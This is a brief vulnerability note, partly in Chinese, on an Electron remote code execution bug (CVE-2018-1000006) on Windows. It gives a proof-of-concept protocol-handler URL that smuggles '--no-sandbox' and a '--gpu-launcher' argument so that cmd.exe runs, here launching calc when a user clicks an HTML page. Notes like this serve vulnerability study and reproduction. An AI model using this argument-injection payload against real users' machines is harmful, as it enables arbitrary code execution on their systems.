Electron<v.1.8.2-beta.4 RCE - CVE-2018-1000006 only for windows Reference https://xianzhi.aliyun.com/forum/topic/1990 https://electronjs.org/blog/protocol-handler-fix Payload chybeta://?" "--no-sandbox" "--gpu-launcher=cmd.exe /c start calc 当用户点击poc.html会执行命令 复现 p师傅的项目里面有复现环境,git地址https://github.com/vulhub/vulhub.git